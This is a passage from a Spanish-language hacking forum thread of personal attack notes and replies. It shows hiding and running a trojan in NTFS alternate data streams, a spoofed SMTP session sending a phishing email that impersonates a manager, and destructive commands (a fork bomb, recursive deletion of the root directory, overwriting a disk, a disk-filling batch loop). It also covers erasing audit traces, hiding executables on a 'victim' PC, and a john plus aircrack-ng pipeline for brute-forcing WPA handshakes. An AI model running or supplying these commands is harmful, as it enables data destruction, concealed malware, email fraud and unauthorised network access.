mediante notepad. Si otro error más super viejo que existe aun en Windows7 Normalmente windows no deja crear ficheros con caracteres especiales Ejemplo: Hidd$en Hid:den Hidde/n c:\>notepad.exe text.txt ------------------------------------------------------------------------------- Hello World ------------------------------------------------------------------------------- Todo bien y si ponemos c:\>notepad.exe text.txt:Hidden.txt ------------------------------------------------------------------------------- Esto solo se lee poniendo c:\>notepad.exe text.txt:Hidden.txt mas nada en windows lo ve porque text.txt:Hidden.txt contiene el caracter especial ":" En fin notepad a creado un fichero que para windows no es indexable. A decir verdad nose si se vea desde linux creo que la solución sería formatear jajajajajaja. Siempre hay que poner algo .txt y después la barrabasada que se les ocurra. Alternate Data Stream (ADS) permite hacer cosas muy interesantes basada en esta técnica y todo se debe que al paracer NTFS no soporta caracteres especiales en su partición o windows no supo como hacerlo y otros si, averiguen ustedes. Si se borra el fichero text.txt se pierde el acceso a text.txt:Hidden.txt Si pornemos directo c:\>notepad.exe ADS.txt:Hidden.txt se crea ADS.txt en blanco y se borra perdemos lo escrito en ADS.txt:Hidden.txt Sysinternals elaboró una herramienta llamada streams que nos permite ver ó borrar ficheros con esta características. Hacer una busqueda recursiva. c:\>streams -s c:\ Borrar contenido ADS. c:\>streams -d c:\ Este fallo solo es en particiones NTFS ------------------------------------------------------------------------------- Se puede usar esto para cosas como troyanos. Moviendo trojan.exe para readme.txt(stream) c:\type c:\trojan.exe > c:\readme.txt:trojan.exe Ejecutando stream c:\start c:\readme.txt:trojan.exe extrayendo trojan.exe de readme.txt(stream) c:\cat c:\readme.txt:trojan.exe > trojan.exe ******************************************************************************* ******************************************************************************* Tanto EncodeBMP como Blindside nos permiten ocultar cosas dentro de una imagen BMP EncodeBMP no tiene caso es muy sencillo y tiene ambiente gráfico. En Blindside se extrae: c:\Blindside\bside.exe -x decode Imagen.BMP MP3Stego nos permite esconder cosas en ficheros MP3 Ocultando en MP3. c:\MP3Stego>encode -E hidden_text.txt -P pass svega.wav svega_stego.mp3 Desocultando en MP3. c:\MP3Stego>decode -X -P pass svega_stego.mp3 Si se desea documentarse mas la tecnica es conocida como steganography Herramientas conocidas de para esconder informacion. makestrm LADS LNS Steganography FreeSteganography MP3Stego snow ******************************************************************************* ******************************************************************************* Enviar correo anónimo. C:\>telnet mail.example.com 25 Trying 192.168.1.101... Connected to mail.example.com. Escape character is '^]'. 220 mail.example.com ESA3400/SMTP Ready. C:\>HELO mail.fakehost.com 250 Requested mail action okay, completed. C:\>MAIL FROM:<attacker@fakehost.com> 250 Requested mail action okay, completed. C:\>RCPT TO:<nick@example.com> 250 Requested mail action okay, completed. C:\>DATA 354 Enter mail, end with "." on a line by itself. C:\>From: Tony Spinelli <tony@example.com> C:\>To: Nick Nedostup <nick@example.com> C:\>Subject: Please call me about your review C:\>Nick, C:\>It is time for year-end reviews. Please contact me on my new personal C:\>cellphone number 555-1212, so that we can discuss your performance. C:\>By the way, if I don't answer, just leave me a voicemail.. I'm in C:\>meetings all day. Also see if you can add me on Yahoo! Messenger, C:\>my handle is t0nyspinelli. C:\>Tony Spinelli C:\>Example Corp. C:\>Office: 555-1111 C:\>Mobile: 555-1212 (NEW) C:\>. 250 Ok: queued as 12345 C:\>QUIT ******************************************************************************* ******************************************************************************* Escuchar el sonido del disco duro, no es perjudicial. $sudo cat /dev/sda | aplay -fdat ******************************************************************************* ******************************************************************************* Ejecuta muchos comandos hasta bloquear linux, se le conoce como forkbomb. $:(){:|:&};: Borra todo los fichero desde / recursivamente es equivalente a un format Windows $m -rf / Sobrescribe el dispositivo /dev/sda provando la perdida de todos los datos $cualquier_comando > /dev/sda ******************************************************************************* ******************************************************************************* Borrando huellas Claves del registro que debemos considerar. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail Inicio/Configuración/Barra de tareas y menú Inicio/Opciones avanzadas/Borrar. %systemroot%\system32\LogFiles Ojo con los .log y los .evt Podemos hacer C:\>dir /s *.log >All_Logs.txt C:\>dir /s *.evt >All_Event.txt ******************************************************************************* ******************************************************************************* Excelente lugar para esconder .exe Windows7 C:\Users\loko\AppData\Local\Microsoft\Windows\Temporary Internet Files> Windows Xp C:\Documents and Settings\Usuario\Configuración Local\Archivos temporales de Internet\ Nota: El motivo es muy sencillo no se ven desde el explorer y aun cuando se borre la cache de iexplore sigue ahí. Donde dice Usuario en Windows Xp se debe sustituir por el usuario de la PC Víctima. ******************************************************************************* ******************************************************************************* Hacker actuales reconocidos, buscar redacciones y programas en www.google.com Gospel Lympex Rojodos HD Moore Vic_Thor Andrés Tarascó Acuña ******************************************************************************* ******************************************************************************* Llenado de disco duro solo a base de carpetas (DOS más usado). Hacer un cmd o bat con las siguientes líneas. mkdir.bat ------------------------------------------------------------------------------ :l mkdir AAA cd AAA goto l ------------------------------------------------------------------------------ Ejecutar. C:\>mkdir.bat ******************************************************************************* ******************************************************************************* Servicios de Netbios. Nombre Sufijo Tipo Servicio ------------------------------------------------------------------------------ <nombre_del_ordenador> 00 U Workstation Service <nombre_del_ordenador> 01 U Messenger Service <\\_MSBROWSE_> 01 G Master Browser <nombre_del_ordenador> 03 U Messenger Service <nombre_del_ordenador> 06 U RAS Server Service <nombre_del_ordenador> 1F U NetDDE Service <nombre_del_ordenador> 20 U File Server Service <nombre_del_ordenador> 21 U RAS Client Service <nombre_del_ordenador> 22 U Exchange Interchange <nombre_del_ordenador> 23 U Exchange Store <nombre_del_ordenador> 24 U Exchange Directory <nombre_del_ordenador> 30 U Modem Sharing Server Service <nombre_del_ordenador> 31 U Modem Sharing Client Service <nombre_del_ordenador> 43 U SMS Client Remote Control <nombre_del_ordenador> 44 U SMS Admin Remote Control Tool <nombre_del_ordenador> 45 U SMS Client Remote Chat <nombre_del_ordenador> 46 U SMS Client Remote Transfer <nombre_del_ordenador> 4C U DEC Pathworks TCPIP Service <nombre_del_ordenador> 52 U DEC Pathworks TCPIP Service <nombre_del_ordenador> 87 U Exchange MTA <nombre_del_ordenador> 6A U Exchange IMC <nombre_del_ordenador> BE U Network Monitor Agent <nombre_del_ordenador> BF U Network Monitor Apps <nombre_del_usuario> 03 U Messenger Service <dominio> 00 G Domain Name <dominio> 1B U Domain Master Browser <dominio> 1C G Domain Controllers <dominio> 1D U Master Browser <dominio> 1E G Browser Service Elections <INetServicios> 1C G Internet Information Server <ISnombre_de_ordenador> 00 U Internet Information Server ******************************************************************************* ******************************************************************************* Puertos. Solo es posible de 1 al 65536 Nombre de la función Puerto Protocolo/Función echo 7 tcp echo 7 udp discard 9 tcp sink null discard 9 udp sink null systat 11 tcp systat 11 tcp users daytime 13 tcp daytime 13 udp netstat 15 tcp qotd 17 tcp quote qotd 17 udp quote chargen 19 tcp ttytst source chargen 19 udp ttytst source ftp-data 20 tcp ftp 21 tcp telnet 23 tcp smtp 25 tcp mail time 37 tcp timserver time 37 udp timserver rlp 39 udp resource # resource location name 42 tcp nameserver name 42 udp nameserver whois 43 tcp nicname # usually to sri-nic domain 53 tcp nameserver # name-domain server domain 53 udp nameserver nameserver 53 tcp domain # name-domain server nameserver 53 udp domain mtp 57 tcp # deprecated bootp 67 udp # boot program server tftp 69 udp rje 77 tcp netrjs finger 79 tcp link 87 tcp ttylink supdup 95 tcp hostnames 101 tcp hostn Título: Re: Anotaciones Publicado por: kub0x en 6 Agosto 2012, 03:51 am Bastante útil a la hora de revisar comandos para realizar una posible intrusión en un sistema.
Gracias por compartirlo ;) Título: Re: Anotaciones Publicado por: SrRokie en 25 Septiembre 2012, 08:14 am Excelente Aporte ... harto tiempo en lectura ....salu2 desde CHL
Good <-- Good <-- Good <-- Aporte!! ;-) Título: Re: Anotaciones Publicado por: P4nd3m0n1um en 25 Septiembre 2012, 09:24 am muy buen aporte.
Título: Re: Anotaciones Publicado por: adastra en 25 Septiembre 2012, 12:53 pm útiles recomendaciones.
Gracias por compartir. Título: Re: Anotaciones Publicado por: AngelFire en 7 Enero 2013, 05:35 am No se cuan util les sea pero es una buena combinacion John mas aircrack quedaria asi.
******************************************************************************* ******************************************************************************* John + Aircrack #john --incremental=all --stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w - Si tienen pensado interrumpirlo y no quieres empezar de cero hacen una sección. #john --incremental=all --session=WirelessBrute --stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w - Reanudar #john --restore=WirelessBrute | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w - ******************************************************************************* ******************************************************************************* No he logrado mucho con esto contra capturas de redes wifi bajo cifrado WPA una vez que tengo el famoso handshake hasta donde he leido es practicamente imposible hackearlas, se les pasa un diccionario que casi nunca trae la palabra jajajaj y no hay otra porque miren este calculador de password jajajaja realmente comico pero real: http://lastbit.com/pswcalc.asp En fin WPA es un problemas, y wash mas reaver tampoco me ha dado nada jajaja. Gracias aquellos que dedicaron parte de su tiempo a leer y escribir algo. Saludos |